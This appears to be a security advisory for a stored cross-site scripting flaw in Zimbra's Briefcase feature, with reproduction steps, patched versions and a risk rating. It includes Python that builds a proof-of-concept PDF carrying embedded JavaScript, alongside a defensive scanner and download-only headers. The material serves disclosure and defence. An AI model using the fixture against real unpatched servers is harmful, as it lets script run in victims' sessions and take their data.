Zimbra Collaboration Stored Cross-Site Scripting Vulnerability in Briefcase Feature

Vulnerability

A stored cross-site scripting (XSS) vulnerability has been identified in Zimbra Collaboration (ZCS) versions 10.0 and 10.1 (a fix is also published for the 8.8.15 line; see Remediation). It arises in the Briefcase feature because certain uploaded file types are not adequately sanitized before they are served back to users. When a user opens a publicly shared Briefcase file that carries embedded script, the JavaScript executes in that user's session context in the ZCS web application, so an attacker can perform actions or read data on behalf of the affected user.

Impact

Exploitation yields stored XSS: the injected script persists in the shared Briefcase item and runs in the browser session of every user who opens it. Because it executes with the victim's authenticated ZCS session, the payload can perform actions and exfiltrate data on that user's behalf. The attacker needs only the ability to upload a file to a Briefcase and share it publicly; the victim needs only to open the shared file.

Reproduction

To reproduce, upload a PDF that contains embedded JavaScript into the Zimbra Briefcase and share the item publicly. Open the public share in a browser: the embedded JavaScript executes, demonstrating the stored XSS. Whether a given file type renders inline, and therefore whether its script runs, depends on how the instance serves the file and on the browser's viewer, so run the same file against a patched build as the control.
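The following is an added example, not code from Zimbra or from the original advisory. The first part builds the kind of test file the reproduction steps call for: a minimal, well-formed PDF whose document-open action carries embedded JavaScript. The second part is the check a practitioner would want on the defensive side: a conservative upload filter that flags PDFs carrying active content (looking through `#xx`-escaped names and Flate-compressed streams), plus the response headers that keep an accepted upload from rendering inline in the application's origin. Everything is constructed inline; the function names (`build_pdf`, `pdf_active_content`, `download_only_headers`) and the header policy are this example's own assumptions, not a description of Zimbra's patched code.

```python
"""
Added example, not code from Zimbra or from the original advisory.

Part 1 builds a minimal PDF whose /OpenAction carries embedded JavaScript
(a constructed test fixture for the reproduction steps).  Part 2 is a
conservative filter that flags PDFs with active content, and the headers an
upload-serving endpoint would use so that an accepted file is downloaded,
never rendered in the web application's origin.
"""
import re
import zlib

# PDF name objects that introduce executable or auto-triggered content.
ACTIVE_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
               b"/Launch", b"/RichMedia", b"/EmbeddedFile")


def _pdf_literal(s: str) -> bytes:
    """Encode s as a PDF literal string, escaping backslash and parentheses."""
    raw = s.encode("latin-1")
    for ch in (b"\\", b"(", b")"):          # backslash first, so escapes are not re-escaped
        raw = raw.replace(ch, b"\\" + ch)
    return b"(" + raw + b")"


def build_pdf(script=None) -> bytes:
    """Return a well-formed one-page PDF.  If script is given, the catalog's
    /OpenAction points at a JavaScript action that runs in any viewer that
    honours PDF JavaScript.  The xref table is computed, not hard-coded."""
    catalog = b"<< /Type /Catalog /Pages 2 0 R"
    if script is not None:
        catalog += b" /OpenAction 4 0 R"
    objects = [
        catalog + b" >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
    ]
    if script is not None:
        objects.append(b"<< /Type /Action /S /JavaScript /JS "
                       + _pdf_literal(script) + b" >>")
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))            # xref needs each object's byte offset
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objects) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objects) + 1, xref_pos))
    return bytes(out)


def pdf_active_content(data: bytes) -> list:
    """Return the active-content keys present in data, in ACTIVE_KEYS order.
    Inflates FlateDecode streams (keys parked in object streams) and undoes
    #xx name escapes before matching.  An empty list means 'nothing found',
    not 'safe'; a production filter would add a full PDF parser on top."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("not a PDF")
    text = bytearray(data)
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            text += zlib.decompress(m.group(1))
        except zlib.error:
            pass                            # uncompressed or other filter: raw bytes already present
    # /J#61vaScript names the same key as /JavaScript; normalise before matching.
    text = re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), bytes(text))
    return [k.decode() for k in ACTIVE_KEYS
            if re.search(re.escape(k) + rb"(?![A-Za-z])", text)]


def download_only_headers(filename: str, content_type: str) -> dict:
    """Headers for serving an accepted upload from a share endpoint so the
    browser downloads it rather than rendering it in the app's origin
    (assumed policy for your own handler, not Zimbra's patched code)."""
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{safe}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


if __name__ == "__main__":
    fixture = build_pdf("app.alert('briefcase xss test');")
    print("fixture:", pdf_active_content(fixture))      # ['/JavaScript', '/JS', '/OpenAction']
    print("clean:  ", pdf_active_content(build_pdf()))  # []
```

Write `build_pdf(...)` to a file to use it as the upload in the reproduction steps; the scanner is the kind of gate a file store should apply before a shared item is ever served, and the headers are the fallback for anything the gate misses.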

Remediation

Upgrade to ZCS 10.1.16, 10.0.18, or 8.8.15 Patch 47; each includes the fix. Any installation on an earlier release of those lines should be treated as affected. The installed release can be checked with `zmcontrol -v` as the zimbra user.

Added: Mar 20, 2026, 2:22 PM
Updated: Mar 20, 2026, 2:22 PM

Vulnerability Rating

Custom Algorithm
spread: 3.4
impact: 3.5
exploitability: 5.5
remediation: 7.7
relevance: 4.2
threat: 1.6
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.